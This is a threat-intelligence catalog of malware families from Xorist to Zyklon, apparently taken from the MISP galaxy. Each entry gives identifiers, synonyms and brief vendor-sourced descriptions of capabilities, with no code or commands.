According to PCrisk, Xorist is a family of ransomware-type malware. After stealth system infiltration, ransomware from this family encrypts various files stored on the computer. After encrypting the files, this ransomware creates a 'How to Decrypt Files.txt text file on the victim's desktop. The file contains a message stating that the files can only be restored by paying a ransom.

Internal MISP references

UUID 029369aa-9e88-4e98-8fda-ca29a873acc5 which can be used as unique global reference for Xorist in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

XP10

Ransomware.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular XP10.

Known Synonyms
`FakeChrome Ransomware`

Internal MISP references

UUID 6aa7047f-7dfa-4a10-b515-853c3795db69 which can be used as unique global reference for XP10 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

xPack

Symantec describes this as a decryptor/loader used by Chinese threat actor Antlion in campaigns targeting Taiwan.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular xPack.

Known Synonyms
`NERAPACK`

Internal MISP references

UUID f87a348e-fa1f-4c90-8b46-ef382868d043 which can be used as unique global reference for xPack in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Xpan

Internal MISP references

UUID 4da036c4-b76d-4f25-bc9e-3c5944ad0993 which can be used as unique global reference for Xpan in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

XPCTRA

Incorporates code of Quasar RAT.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular XPCTRA.

Known Synonyms
`Expectra`

Internal MISP references

UUID 5f9ba149-100a-46eb-a959-0645d872975b which can be used as unique global reference for XPCTRA in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

XpertRAT

According to PCrisk, XpertRAT is a Remote Administration Trojan, a malicious program that allows cyber criminals to remotely access and control infected computers. Typically, users download and install this software inadvertently because they are tricked. By having computers infected with malware such as XpertRAT, users can experience serious problems.

Internal MISP references

UUID d03cb3af-2a01-4e46-859a-6b61f3ec3c68 which can be used as unique global reference for XpertRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

XP PrivEsc (CVE-2014-4076)

Internal MISP references

UUID 33f97c52-0bcd-43f4-88bb-99e7da9f49ae which can be used as unique global reference for XP PrivEsc (CVE-2014-4076) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

XServer

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular XServer.

Known Synonyms
`Filesnfer`

Internal MISP references

UUID b895ec07-19f7-4131-87c0-fc713fff2351 which can be used as unique global reference for XServer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

xsPlus

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular xsPlus.

Known Synonyms
`nokian`

Internal MISP references

UUID b255fd2c-6ddb-452f-b660-c9f5d3a2ff63 which can be used as unique global reference for xsPlus in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

XTunnel

X-Tunnel is a network proxy tool that implements a custom network protocol encapsulated in the TLS protocol.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular XTunnel.

Known Synonyms
`Shunnael`
`X-Tunnel`
`xaps`

Internal MISP references

UUID 53089817-6d65-4802-a7d2-5ccc3d919b74 which can be used as unique global reference for XTunnel in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

X-Tunnel (.NET)

This is a rewrite of win.xtunnel using the .NET framework that surfaced late 2017.

Internal MISP references

UUID 000e25a4-4623-4afc-883d-ecc15be8f9d0 which can be used as unique global reference for X-Tunnel (.NET) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Xwo

In March 2019, AT&T Alien Labs identified a new malware family that is actively scanning for exposed web services and default passwords. Based on our findings we are calling it “Xwo” - taken from its primary module name. It is likely related to the previously reported malware families Xbash and MongoLock.

Internal MISP references

UUID 8a57cd75-4572-47c2-b5ef-55df978258de which can be used as unique global reference for Xwo in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

XWorm

Malware with wide range of capabilities ranging from RAT to ransomware.

Internal MISP references

UUID a5a05a52-5267-4baf-b4a3-366409b46721 which can be used as unique global reference for XWorm in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

xxmm

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular xxmm.

Known Synonyms
`ShadowWalker`

Internal MISP references

UUID 1d451231-8b27-4250-b3db-55c5c8ea99cb which can be used as unique global reference for xxmm in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

X-ZIGZAG

The author of X-ZIGZAG claims that it is a lightweight and stealthy Windows Remote Access Trojan (RAT) designed for educational purposes.

Internal MISP references

UUID a9f3ab12-4d4d-4904-a4b6-d8b48d4e4ac2 which can be used as unique global reference for X-ZIGZAG in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Yahoyah

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Yahoyah.

Known Synonyms
`KeyBoy`

Internal MISP references

UUID a673b4fb-a864-4a5b-94ab-3fc4f5606cc8 which can be used as unique global reference for Yahoyah in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Yakuza

Ransomware.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Yakuza.

Known Synonyms
`Teslarvng Ransomware`

Internal MISP references

UUID 0308eff9-1e8c-434e-b551-40f0ceb7dc0e which can be used as unique global reference for Yakuza in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

YamaBot

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular YamaBot.

Known Synonyms
`Kaos`

Internal MISP references

UUID 56243aaa-449e-4c0d-bb51-3f0b6294ec7d which can be used as unique global reference for YamaBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Yanluowang

According to PCrisk, Yanluowang is ransomware that encrypts (and renames) files, ends all running processes, stops services, and creates the "README.txt" file containing a ransom note. It appends the ".yanluowang" extension to filenames. Cybercriminals behind Yanluowang are targeting enterprise entities and organizations in the financial sector.

Files encrypted by Yanluowang can be decrypted with this tool (it is possible to decrypt all files if the original file is larger than 3GB. If the original file is smaller than 3GB, then only smaller files can be decrypted).

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Yanluowang.

Known Synonyms
`Dryxiphia`

Internal MISP references

UUID 4bc19ce2-e169-4f9f-aabf-ec7fc6a75d12 which can be used as unique global reference for Yanluowang in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

YaRAT

According to PTSecurity, this RAT uses Yandex Disk as a C2.

Internal MISP references

UUID 62fd30bc-1af6-40cc-a363-bb6aa85433cb which can be used as unique global reference for YaRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Yarraq

Yarraq is a ransomware that encrypts files by using asymmetric keys and adding '.yarraq' as extension to the end of filenames. At the time of writing the attacker asks for $2000 ransom in order to provide a decryptor, to enable victims to restore their original files back. To communicate with the attacker the email: cyborgyarraq@protonmail.ch is provided.

Internal MISP references

UUID 3bba089d-cd27-465c-8c40-2ff9ff0316c6 which can be used as unique global reference for Yarraq in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Yasso

According to Palo Alto Networks, Yasso is an open source multi-platform intranet-assisted penetration toolset that brings together a number of features such as scanning, brute forcing, remote interactive shell, and running arbitrary commands. It is authored by a Mandarin-speaking pentester nicknamed Sairson.

Internal MISP references

UUID d58a18e8-e866-42df-a315-a1f72d2c26aa which can be used as unique global reference for Yasso in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Yatron

Internal MISP references

UUID 710a27e6-0f17-4fa7-bcb9-e130fcb1ee7f which can be used as unique global reference for Yatron in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

yayih

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular yayih.

Known Synonyms
`aumlib`
`bbsinfo`

Internal MISP references

UUID 81157066-c2f6-4625-8070-c0a793d57e18 which can be used as unique global reference for yayih in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Yellow Cockatoo RAT

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Yellow Cockatoo RAT.

Known Synonyms
`Polazer`

Internal MISP references

UUID f1d49672-b857-4ad6-887f-f2bf2bc7c641 which can be used as unique global reference for Yellow Cockatoo RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Yoddos

Internal MISP references

UUID 8d67586f-3390-474b-a81e-8be90833f25f which can be used as unique global reference for Yoddos in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

YoreKey

Internal MISP references

UUID cf9b5867-77db-423d-9bdf-cfc0d24d39c9 which can be used as unique global reference for YoreKey in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

YoungLotus

Simple malware with proxy/RDP and download capabilities. It often comes bundled with installers, in particular in the Chinese realm.

PE timestamps suggest that it came into existence in the second half of 2014.

Some versions perform checks of the status of the internet connection (InternetGetConnectedState: MODEM, LAN, PROXY), some versions perform simple AV process-checks (CreateToolhelp32Snapshot).

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular YoungLotus.

Known Synonyms
`DarkShare`

Internal MISP references

UUID 1cc9d450-88cd-435c-bb74-8410d2d22571 which can be used as unique global reference for YoungLotus in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

YourCyanide

According to Trend Micro, this is a ransomware written as a Windows commandline script, with obfuscation applied.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular YourCyanide.

Known Synonyms
`GonnaCope`
`Kekpop`
`Kekware`

Internal MISP references

UUID 4a9b8725-2d17-4601-adb4-67de607808d7 which can be used as unique global reference for YourCyanide in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

YTStealer

According to Intezer, YTStealer is a malware whose objective is to steal YouTube authentication cookies. As a stealer, it operates like many other stealers. The first thing it does when it’s executed is to perform some environment checks. This is to detect if the malware is being analyzed in a sandbox.

Internal MISP references

UUID 302854bd-0e03-422c-8b79-54200c7d02ea which can be used as unique global reference for YTStealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

yty

Internal MISP references

UUID c0e8b64c-bd2c-4a3e-addc-0ed6cc1ba200 which can be used as unique global reference for yty in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Yunsip

W32/Yunsip!tr.pws is classified as a password stealing trojan. Password Stealing Trojan searches the infected system for passwords and send them to the hacker.

Internal MISP references

UUID 1f8755ac-3dcc-43bd-a07f-cf0fbf2cdb7d which can be used as unique global reference for Yunsip in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Z3

Ransomware.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Z3.

Known Synonyms
`Z3enc Ransomware`

Internal MISP references

UUID 3eb96cd0-2d00-45a8-a0a4-54663cc70ab9 which can be used as unique global reference for Z3 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Zacinlo

Bitdefender describes the primary features of the family as follows: Presence of a rootkit driver that protects itself as well as its other components, presence of man-in-the-browser capabilities that intercepts and decrypts SSL communications, and presence of an adware cleanup routine used to remove potential competition in the adware space. It also communicates with its C&C server, sending environment information such as installed AV and other applications. The malware also takes screenshots and does browser redirects, potentially manipulating the DOM tree. It also creates traffic in hidden windows, likely causing adfraud. The malware is generally very configurable and internally makes use of Lua scripts.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Zacinlo.

Known Synonyms
`s5mark`

Internal MISP references

UUID 5041fed8-25a2-4da2-b2ab-db2364cc064f which can be used as unique global reference for Zacinlo in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ZarDoor

Internal MISP references

UUID e4f7e46a-65b8-4d17-b4d8-a2f8b2047c22 which can be used as unique global reference for ZarDoor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Zebrocy

According to brandefense, Zebrocy is malware that falls into the Trojan category, which the threat actor group APT28/Sofacy has used since 2015. Zebrocy malware consists of 3 main components; Backdoor, Downloader, and Dropper. The Downloader and Dropper take responsibility for discovery processes and downloading the main malware on the systems. At the same time, Backdoor undertakes the duties such as persistence in the system, espionage, and data extraction.

This malware, which is not considered new, has variants in many languages from the past to the present. These include programming languages such as Delphi, C#, Visual C++, VB.net, and Golang. Furthermore, we know advanced threat actors and groups revise their malicious software among their toolkits at certain time intervals using different languages and technologies.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Zebrocy.

Known Synonyms
`Zekapab`

Internal MISP references

UUID 973124e2-0d84-4be5-9c8e-3ff16bb43b42 which can be used as unique global reference for Zebrocy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Zebrocy (AutoIT)

Internal MISP references

UUID 4a5f2088-18cb-426a-92e2-1eb752c294c0 which can be used as unique global reference for Zebrocy (AutoIT) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Zedhou

Internal MISP references

UUID 2211eade-4980-4143-acd7-5ecda26d9dfa which can be used as unique global reference for Zedhou in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.zedhou - webarchive

Associated metadata

Metadata key	Value
type	[]

zenar

Internal MISP references

UUID 7502f293-0b7f-417f-a13a-1c71dadc5ccc which can be used as unique global reference for zenar in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Zeoticus

Internal MISP references

UUID 92e89ff1-eae9-4d71-9031-80cca544952e which can be used as unique global reference for Zeoticus in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Zeppelin

Zeppelin is a ransomware written in Delphi and sold a as-a-service. The Cylance research team notes that it is a clear evolution of the known VegaLocker, but they assessed it as a new family becaue of additionally developed modules that makes Zeppelin much more configurable than Vegalocker. There are executable variants of type DLL and EXE.

Internal MISP references

UUID 5587d163-d5ec-43fc-8071-7e7cd1002ba7 which can be used as unique global reference for Zeppelin in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ZeroAccess

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ZeroAccess.

Known Synonyms
`Max++`
`Sirefef`
`Smiscer`

Internal MISP references

UUID c7ff274f-2acc-4ee2-b74d-f1def12918d7 which can be used as unique global reference for ZeroAccess in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ZeroCleare

ZeroCleare is a destructive malware. It has been developed in order to wipe the master boot record section in order to damage a disk's partitioning. Attackers use the EldoS RawDisk driver to perform the malicious action, which is not a signed driver and would therefore not runnable by default. The attackers managed to install it by using a vulnerable version of VBoxDrv driver, which the DSE accepts and runs. Used to attack middle-east energy and industrial sectors.

Internal MISP references

UUID a7e1429f-55bd-41ac-bf45-70c93465d113 which can be used as unique global reference for ZeroCleare in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ZeroEvil

ZeroEvil is a malware that seems to be distributed by an ARSguarded VBS loader.

It first connects to a gate.php (version=). Upon success, an embedded VBS gets started connecting to logs_gate.php (plugin=, report=). So far, only one embedded VBS was observed: it creates and starts a PowerShell script to retrieve all password from the Windows.Security.Credentials.PasswordVault. Apart from that, a screenshot is taken and a list of running processes generated.

The ZeroEvil executable contains multiple DLLs, sqlite3.dll, ze_core.DLL (Mutex) and ze_autorun.DLL (Run-Key).

Internal MISP references

UUID 585f9f75-1239-4561-8815-c5ae033053a1 which can be used as unique global reference for ZeroEvil in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ZeroLocker

Internal MISP references

UUID b226e6bb-b8bf-4c5d-b0b3-c7c04d12679a which can be used as unique global reference for ZeroLocker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Zeropadypt

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Zeropadypt.

Known Synonyms
`Ouroboros`

Internal MISP references

UUID b8f99ed3-5669-4c71-b217-e92659a6e6bd which can be used as unique global reference for Zeropadypt in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ZeroT

Internal MISP references

UUID 9b0aa458-dfa9-48af-87ea-c36d1501376c which can be used as unique global reference for ZeroT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Zeus

According to CrowdStrike, The two primary goals of the Zeus trojan horse virus are stealing people's financial information and adding machines to a botnet. Unlike many types of malware, most Zeus variants try to avoid doing long-term damage to the devices they infect. Their aim is to avoid detection from antivirus software.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Zeus.

Known Synonyms
`Zbot`

Internal MISP references

UUID 4e8c1ab7-2841-4823-a5d1-39284fb0969a which can be used as unique global reference for Zeus in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ZeusAction

Internal MISP references

UUID 95057d7a-b95a-4173-bae7-9256ae002543 which can be used as unique global reference for ZeusAction in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Zeus MailSniffer

Internal MISP references

UUID 768f1ae5-81a6-49f2-87c1-821c247b4bf3 which can be used as unique global reference for Zeus MailSniffer in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_mailsniffer - webarchive

Associated metadata

Metadata key	Value
type	[]

Zeus OpenSSL

This family describes the Zeus-variant that includes a version of OpenSSL and usually is downloaded by Zloader.

In June 2016, the version 1.5.4.0 (PE timestamp: 2016.05.11) appeared, downloaded by Zloader (known as DEloader at that time). OpenSSL 1.0.1p is statically linked to it, thus its size is roughly 1.2 MB. In subsequent months, that size increased up to 1.6 MB. In January 2017, with version 1.14.8.0, OpenSSL 1.0.2j was linked to it, increasing the size to 1.8 MB. Soon after also in January 2017, with version v1.15.0.0 the code was obfuscated, blowing up the size of the binary to 2.2 MB.

Please note that IBM X-Force decided to call win.zloader/win.zeus_openssl "Zeus Sphinx", after mentioning it as "a new version of Zeus Sphinx" in their initial post in August 2016. Malpedia thus lists the alias "Zeus XSphinx" for win.zeus_openssl - the X to refer to IBM X-Force.

Zeus Sphinx on the one hand has the following versioning ("slow increase") - 2015/09 v1.0.1.0 (Zeus Sphinx size: 1.5 MB) - 2016/02 v1.0.1.2 (Zeus Sphinx size: 1.5 MB) - 2016/04 v1.0.2.0 (Zeus Sphinx size: 1.5 MB)

Zeus OpenSSL on the other hand has the following versioning ("fast increase") - 2016/05 v1.5.4.0 (Zeus OpenSSL size: 1.2 MB) - 2017/01 v1.14.8.0 (Zeus OpenSSL size: 1.8 MB) - 2017/01 v1.15.0.0 (Zeus OpenSSL size: 2.2 MB)

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Zeus OpenSSL.

Known Synonyms
`XSphinx`

Internal MISP references

UUID 74fc6a3a-cc51-4065-bdd9-fcef18c988a0 which can be used as unique global reference for Zeus OpenSSL in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Zeus Sphinx

This family describes the vanilla Zeus-variant that includes TOR (and Polipo proxy). It has an almost 90% overlap with Zeus v2.0.8.9. Please note that IBM X-Force decided to call win.zloader/win.zeus_openssl "Zeus Sphinx", after mentioning it as "a new version of Zeus Sphinx" in their initial post in August 2016. Malpedia thus lists the alias "Zeus XSphinx" for win.zeus_openssl - the X to refer to IBM X-Force.

Zeus Sphinx on the one hand has the following versioning ("slow increase") - 2015/09 v1.0.1.0 (Zeus Sphinx size: 1.5 MB) - 2016/02 v1.0.1.2 (Zeus Sphinx size: 1.5 MB) - 2016/04 v1.0.2.0 (Zeus Sphinx size: 1.5 MB)

Zeus OpenSSL on the other hand has the following versioning ("fast increase") - 2016/05 v1.5.4.0 (Zeus OpenSSL size: 1.2 MB) - 2017/01 v1.14.8.0 (Zeus OpenSSL size: 1.8 MB) - 2017/01 v1.15.0.0 (Zeus OpenSSL size: 2.2 MB)

Internal MISP references

UUID 997c20b0-0992-498a-b69d-fc16ab2fd4e4 which can be used as unique global reference for Zeus Sphinx in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Zezin

Internal MISP references

UUID 38de079b-cc4c-47b0-b47f-ad4c013d8a1f which can be used as unique global reference for Zezin in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

zgRAT

zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets. Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.

Internal MISP references

UUID 0c3ea882-72a7-4838-b79a-150be30b6a36 which can be used as unique global reference for zgRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ZhCat

Internal MISP references

UUID 3c74a04d-583e-40ec-b347-bdfeb534c614 which can be used as unique global reference for ZhCat in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ZhMimikatz

Internal MISP references

UUID 989330e9-52da-4489-888b-686429db3a45 which can be used as unique global reference for ZhMimikatz in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ZingoStealer

An information stealer written in .NET.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ZingoStealer.

Known Synonyms
`Ginzo`

Internal MISP references

UUID 3984dfa1-45dc-4c19-92ca-3b90b89c8c62 which can be used as unique global reference for ZingoStealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ZitMo

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ZitMo.

Known Synonyms
`ZeuS-in-the-Mobile`

Internal MISP references

UUID 6f08bd79-d22a-471c-882b-f68a42eb4a23 which can be used as unique global reference for ZitMo in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ZiyangRAT

Internal MISP references

UUID c23aac20-4987-4c15-af63-7043026c5f82 which can be used as unique global reference for ZiyangRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Zloader

This family describes the (initially small) loader, which downloads Zeus OpenSSL.

In June 2016, a new loader was dubbed DEloader by Fortinet. It has some functions borrowed from Zeus 2.0.8.9 (e.g. the versioning, nrv2b, binstorage-labels), but more importantly, it downloaded a Zeus-like banking trojan (-> Zeus OpenSSL). Furthermore, the loader shared its versioning with the Zeus OpenSSL it downloaded. The initial samples from May 2016 were small (17920 bytes). At some point, visualEncrypt/Decrypt was added, e.g. in v1.11.0.0 (September 2016) with size 27648 bytes. In January 2017 with v1.15.0.0, obfuscation was added, which blew the size up to roughly 80k, and the loader became known as Zloader aka Terdot. These changes may be related to the Moskalvzapoe Distribution Network, which started the distribution of it at the same time.

Please note that IBM X-Force decided to call win.zloader/win.zeus_openssl "Zeus Sphinx", after mentioning it as "a new version of Zeus Sphinx" in their initial post in August 2016. Malpedia thus lists the alias "Zeus XSphinx" for win.zeus_openssl - the X to refer to IBM X-Force.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Zloader.

Known Synonyms
`DELoader`
`SILENTNIGHT`
`Terdot`

Internal MISP references

UUID 13236f94-802b-4abc-aaa9-cb80cf4df9ed which can be used as unique global reference for Zloader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Zlob

Internal MISP references

UUID ddccba7e-89f3-4b51-803c-e473ca5623da which can be used as unique global reference for Zlob in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ZStealer

Information Stealer used by Void Balaur.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ZStealer.

Known Synonyms
`Z*Stealer`

Internal MISP references

UUID 750c4f21-36b0-45b7-80d5-e6c9fdf5134d which can be used as unique global reference for ZStealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Zumanek

According to ESET, this malware family was active exclusively in Brazil until the middle of 2020. It s identified by its method for obfuscating strings. It creates a function for each character of the alphabet and then concatenates the result of calling the correct functions in sequence.

Internal MISP references

UUID 2fde6fa9-6e3f-491f-95f7-107b41efacd8 which can be used as unique global reference for Zumanek in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ZUpdater

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ZUpdater.

Known Synonyms
`Zpevdo`

Internal MISP references

UUID 36a54d23-39ea-446c-b690-6a899890773d which can be used as unique global reference for ZUpdater in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Zupdax

Internal MISP references

UUID 0a0b04d4-afc7-4135-b71e-1148f965b566 which can be used as unique global reference for Zupdax in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ZXShell

According to FireEye, ZXSHELL is a backdoor that can be downloaded from the internet, particularly Chinese hacker websites. The backdoor can launch port scans, run a keylogger, capture screenshots, set up an HTTP or SOCKS proxy, launch a reverse command shell, cause SYN floods, and transfer/delete/run files. The publicly available version of the tool provides a graphical user interface that malicious actors can use to interact with victim backdoors. Simplified Chinese is the language used for the bundled ZXSHELL documentation.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ZXShell.

Known Synonyms
`Sensocode`

Internal MISP references

UUID 23920e3b-246a-4172-bf9b-5e9f90510a15 which can be used as unique global reference for ZXShell in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ZxxZ

Cisco Talos attributes this backdoor with moderate confidence to the Bitter APT.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ZxxZ.

Known Synonyms
`MuuyDownloader`

Internal MISP references

UUID 3782b76b-3fe8-41d9-b258-dac25f9699a2 which can be used as unique global reference for ZxxZ in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Zyklon

According to FireEye, Zyklon or Zyklon HTTP is a publicly available, full-featured backdoor capable of keylogging, password harvesting, downloading and executing additional plugins, conducting distributed denial-of-service (DDoS) attacks, and self-updating and self-removal. The malware may communicate with its command and control (C2) server over The Onion Router (Tor) network if configured to do so. The malware can download several plugins, some of which include features such as cryptocurrency mining and password recovery, from browsers and email software. Zyklon also provides a very efficient mechanism to monitor the spread and impact.

Internal MISP references

UUID 721e9af0-8a60-4b9e-9137-c23e86d75722 which can be used as unique global reference for Zyklon in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]